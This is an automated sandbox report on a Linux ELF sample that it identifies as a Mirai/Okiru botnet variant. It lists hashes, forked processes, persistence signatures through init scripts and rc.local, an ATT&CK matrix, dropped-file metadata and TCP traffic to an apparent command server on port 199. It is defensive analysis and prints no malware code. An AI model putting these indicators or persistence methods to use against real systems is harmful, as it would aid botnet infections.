Linux
Analysis Report
m68k.nn.elf
Overview
General Information
Sample name: | m68k.nn.elf |
Analysis ID: | 1566179 |
MD5: | 21660026bffec7a97c1db4267f2e25b7 |
SHA1: | 4d4e4360287bdb490fb17a987c73e222bdf7ad82 |
SHA256: | 9453ed8ea2b513e3dac9ff38f93e4a978a674234a28db0a70b8527c6773aff91 |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1566179 |
Start date and time: | 2024-12-01 15:23:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 59s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | m68k.nn.elf |
Detection: | MAL |
Classification: | mal80.spre.troj.evad.linELF@0/11@0/0 |
- VT rate limit hit for: m68k.nn.elf
Command: | /tmp/m68k.nn.elf |
PID: | 6238 |
Exit Code: | 139 |
Exit Code Info: | SIGSEGV (11) Segmentation fault invalid memory reference |
Killed: | False |
Standard Output: | |
Standard Error: | qemu: uncaught target signal 11 (Segmentation fault) - core dumped |
- system is lnxubuntu20
- m68k.nn.elf New Fork (PID: 6260, Parent: 6238)
- m68k.nn.elf New Fork (PID: 6277, Parent: 6238)
- sh New Fork (PID: 6283, Parent: 6277)
- m68k.nn.elf New Fork (PID: 6317, Parent: 6238)
- sh New Fork (PID: 6319, Parent: 6317)
- m68k.nn.elf New Fork (PID: 6321, Parent: 6238)
- sh New Fork (PID: 6327, Parent: 6321)
- m68k.nn.elf New Fork (PID: 6328, Parent: 6238)
- m68k.nn.elf New Fork (PID: 6330, Parent: 6238)
- sh New Fork (PID: 6335, Parent: 6330)
- m68k.nn.elf New Fork (PID: 6336, Parent: 6238)
- sh New Fork (PID: 6338, Parent: 6336)
- m68k.nn.elf New Fork (PID: 6352, Parent: 6238)
- sh New Fork (PID: 6358, Parent: 6352)
- udisksd New Fork (PID: 6249, Parent: 799)
- udisksd New Fork (PID: 6285, Parent: 799)
- systemd New Fork (PID: 6287, Parent: 6286)
- gnome-session-binary New Fork (PID: 6295, Parent: 1477)
- gdm3 New Fork (PID: 6339, Parent: 1320)
- gdm3 New Fork (PID: 6340, Parent: 1320)
- udisksd New Fork (PID: 6368, Parent: 799)
- udisksd New Fork (PID: 6396, Parent: 799)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Mirai | Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. | No Attribution |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security | ||
JoeSecurity_Okiru | Yara detected Okiru | Joe Security | ||
Click to see the 1 entries |
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: |
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior | ||
Source: | SIGKILL sent: | Jump to behavior |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Mkdir executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file | ||
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file | ||
Source: | Writes shell script file to disk with an unusual file extension: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File: | Jump to dropped file | ||
Source: | File: | Jump to dropped file |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | 1 Data Manipulation |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 2 File and Directory Permissions Modification | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 2 Scripting | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | ReversingLabs | Linux.Backdoor.Mirai |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
154.216.19.139 | unknown | Seychelles | 135357 | SKHT-ASShenzhenKatherineHengTechnologyInformationCo | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
154.216.19.139 | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
91.189.91.43 | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
91.189.91.42 | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Gafgyt | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Mirai, Okiru | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
CANONICAL-ASGB | Get hash | malicious | Mirai, Okiru | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
SKHT-ASShenzhenKatherineHengTechnologyInformationCo | Get hash | malicious | Mirai, Okiru | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
INIT7CH | Get hash | malicious | Mirai, Okiru | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Gafgyt | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
/etc/init.d/m68k.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | ||
/etc/init.d/system | Get hash | malicious | Mirai, Okiru | Browse | ||
/etc/rc.local | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 120 |
Entropy (8bit): | 4.71023514082177 |
Encrypted: | false |
SSDEEP: | 3:KPJRXSC/ANFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRlufoYZX48bbaaeXCO |
MD5: | 82FAEE159509BB5192AA520D95440C3D |
SHA1: | 66BA9BC025F6E90666F34A8E38EAA89B719B7DC8 |
SHA-256: | E7BAC6C0AFEE6CC2EB7C778318124C284367B83C9EF3D6F7DDF9AC38FCF2F990 |
SHA-512: | D63BE1C08A45D85EB6B3DB74A93F1A266E194729CEF8BDB136597C3E89B83C36B495E12ADF73CC24484210824BC5122F87714446B9D1584C9D6ED0C0220D7B1E |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /bin/sh |
File Type: | |
Category: | dropped |
Size (bytes): | 400 |
Entropy (8bit): | 4.612244173377962 |
Encrypted: | false |
SSDEEP: | 12:QRkiMEXNxl8GPUJgjvMHK2FSuKN+dRRucSOyd3:vRGcISzhYOM3 |
MD5: | 42A0E283E013A117BA7E3D837377CF3E |
SHA1: | 6C5454636C1771F46A606C304DCE8B4AB80B566A |
SHA-256: | 1BB893683F5E24931B53216BEFA2506111E440E08ADA73924BE5BC6D93F69F90 |
SHA-512: | 7D60DF45AB791CEF8ED0511D8E1AA36575A58F7213A1A217CB1C51DCABCF7C594441980B4216C81D5027212866421DFADE6FFCEBEFF29E2D81B828A1B7BF2C2B |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 107 |
Entropy (8bit): | 4.6965251577946185 |
Encrypted: | false |
SSDEEP: | 3:TKH4vZKSC/ANFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8luzSXoZX48bzBeLXE0 |
MD5: | 75C3B0070571A42064490B0A59C5F54F |
SHA1: | 5E48FEB277032F0F45255EC98EC6FDDB9710180D |
SHA-256: | 3AAFF2180555B9691F8AECA6944ED2B5574D3612A0B4F91AE56A31DD30F3024B |
SHA-512: | FAE041568F54085F8E91E004C14F26B8DF19267AF398D26166947A9C70BD0BD67C36D02078BD7DFFD0AF924D35EEADFB14880757B78354DA9823C4003FEF50F6 |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 112 |
Entropy (8bit): | 4.648300524622469 |
Encrypted: | false |
SSDEEP: | 3:nAWu58C/ANFDDoCvLdjX48FIbILbaaFOdFXa5O:ANufoYZX48bbaaeXCO |
MD5: | 6B69B8EBA9149CE0E664318604481B1B |
SHA1: | 19EA18B050694AC87A05648235C7EE1BFD891815 |
SHA-256: | 0D26FFA18F7B01205E1A8852E5B2B964711987AE35A7A56F512239F67DBC2D0F |
SHA-512: | AAB12A8BD0B4D5F2970DCA2A2F7B1907F5DE8E68DC2B248CB04657D5F1FC7366E51A1F885ED31F64DD336698A0FF050729230BA4DF1CA860E7675C0F7526A746 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 53 |
Entropy (8bit): | 3.871459242626451 |
Encrypted: | false |
SSDEEP: | 3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e |
MD5: | 2BD9B4BE30579E633FC0191AA93DF486 |
SHA1: | 7D63A9BD9662E86666B27C1B50DB8E7370C624FF |
SHA-256: | 64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D |
SHA-512: | AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 103 |
Entropy (8bit): | 4.539325085623206 |
Encrypted: | false |
SSDEEP: | 3:TgSC/ANFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgluzSXoZX48bbaaeXC0 |
MD5: | 107E2A66E888E012915B4359DF5B17B1 |
SHA1: | A532A61F6D10B765D29B63248E84877DF85BB76C |
SHA-256: | 395C5BF18A2B8360C8D63A43B7FF55712985F066F9789F9B166F2A39092F9055 |
SHA-512: | 6E2FC482B1AB8E3D7166F0A12A56464F071699FB2A110D98E9390822FA8994ABD40B1BA36566FA303FC68AAFB343AD6EA14CFD4EE6A42C9B275DCB94B1033A46 |
Malicious: | true |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 10 |
Entropy (8bit): | 3.121928094887362 |
Encrypted: | false |
SSDEEP: | 3:TKH4vn:hv |
MD5: | 3E2B31C72181B87149FF995E7202C0E3 |
SHA1: | BD971BEC88149956458A10FC9C5ECB3EB99DD452 |
SHA-256: | A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF |
SHA-512: | 543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 301 |
Entropy (8bit): | 5.089772238578568 |
Encrypted: | false |
SSDEEP: | 6:z8ifitRZAMzdK+xE02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+xEp+GWRdtd+GWRXY+GWRuO |
MD5: | 5F2DE4BB7CB64F4FF46C92FBBBD18206 |
SHA1: | E548D43460D28039B78C3BBB88FD906D47831FB1 |
SHA-256: | 53E1138FD67D03288BB94DD07128318C7FF79BFC504DA67BC00F10716F74D25A |
SHA-512: | 50E330A60E42EF795B2387E0296010AF2B3FEAE72EC09ED1F1E7E671B7A4EE30B097F30A428924C7AEE438EE0E6B1C8B6B8EBE60B8B685DB56EDD5942DED1D71 |
Malicious: | false |
Preview: |
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Preview: |
Process: | /usr/libexec/gsd-housekeeping |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | 93B885ADFE0DA089CDF634904FD59F71 |
SHA1: | 5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F |
SHA-256: | 6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D |
SHA-512: | B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE |
Malicious: | false |
Preview: |
Process: | /tmp/m68k.nn.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 17 |
Entropy (8bit): | 3.6168746059562227 |
Encrypted: | false |
SSDEEP: | 3:TgSC/ANln:TglOn |
MD5: | CF5BFD6A623ECC046218AA0EBA4D8FE7 |
SHA1: | E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88 |
SHA-256: | C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560 |
SHA-512: | F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.409844642732425 |
TrID: |
|
File name: | m68k.nn.elf |
File size: | 110'764 bytes |
MD5: | 21660026bffec7a97c1db4267f2e25b7 |
SHA1: | 4d4e4360287bdb490fb17a987c73e222bdf7ad82 |
SHA256: | 9453ed8ea2b513e3dac9ff38f93e4a978a674234a28db0a70b8527c6773aff91 |
SHA512: | ab4c609518ad269cf9022eadadaa446d6ced88b999d1dbacd7fb55764538fdf5b7eb6973ee2c62011b8da8f93fcf7b92a809ceebcf6404d6ab316e993514fc6a |
SSDEEP: | 3072:ZDWZwNZEtT/4LvQw9SxWp6AEdY4QyqT1hblj0qDTCjwaIN:ZK4bG4yq5Vlj0q3CXk |
TLSH: | C4B35BD6B000CEBDFD1ED6BB44170A19F13663805F920F27A25BFCA7ED721985926E81 |
File Content Preview: | .ELF.......................D...4.........4. ...(.................................. .......................(....... .dt.Q............................NV..a....da...|.N^NuNV..J9....f>"y..., QJ.g.X.#....,N."y..., QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 110364 |
Section Header Size: | 40 |
Number of Section Headers: | 10 |
Header String Table Index: | 9 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x80000094 | 0x94 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 2 |
.text | PROGBITS | 0x800000a8 | 0xa8 | 0x17cae | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.fini | PROGBITS | 0x80017d56 | 0x17d56 | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 2 |
.rodata | PROGBITS | 0x80017d64 | 0x17d64 | 0x2bac | 0x0 | 0x2 | A | 0 | 0 | 2 |
.ctors | PROGBITS | 0x8001c914 | 0x1a914 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x8001c91c | 0x1a91c | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x8001c928 | 0x1a928 | 0x5b4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x8001cedc | 0x1aedc | 0x223c | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.shstrtab | STRTAB | 0x0 | 0x1aedc | 0x3e | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x80000000 | 0x80000000 | 0x1a910 | 0x1a910 | 6.4225 | 0x5 | R E | 0x2000 | .init .text .fini .rodata | |
LOAD | 0x1a914 | 0x8001c914 | 0x8001c914 | 0x5c8 | 0x2804 | 5.0206 | 0x6 | RW | 0x2000 | .ctors .dtors .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 1, 2024 15:23:55.210190058 CET | 38968 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.332372904 CET | 199 | 38968 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.332437038 CET | 38968 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.334924936 CET | 38968 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.336323977 CET | 38968 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.338496923 CET | 38970 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.455912113 CET | 199 | 38968 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.459827900 CET | 199 | 38970 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.459876060 CET | 38970 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.461118937 CET | 38970 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.461816072 CET | 38970 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.467716932 CET | 38972 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.500061035 CET | 199 | 38968 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.586286068 CET | 199 | 38970 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.593630075 CET | 199 | 38972 | 154.216.19.139 | 192.168.2.23 |
Dec 1, 2024 15:23:55.593677044 CET | 38972 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.595521927 CET | 38972 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.596487999 CET | 38972 | 199 | 192.168.2.23 | 154.216.19.139 |
Dec 1, 2024 15:23:55.617844105 CET | 38974 | 199 | 192.168.2.23 | 154.216.19.139 |
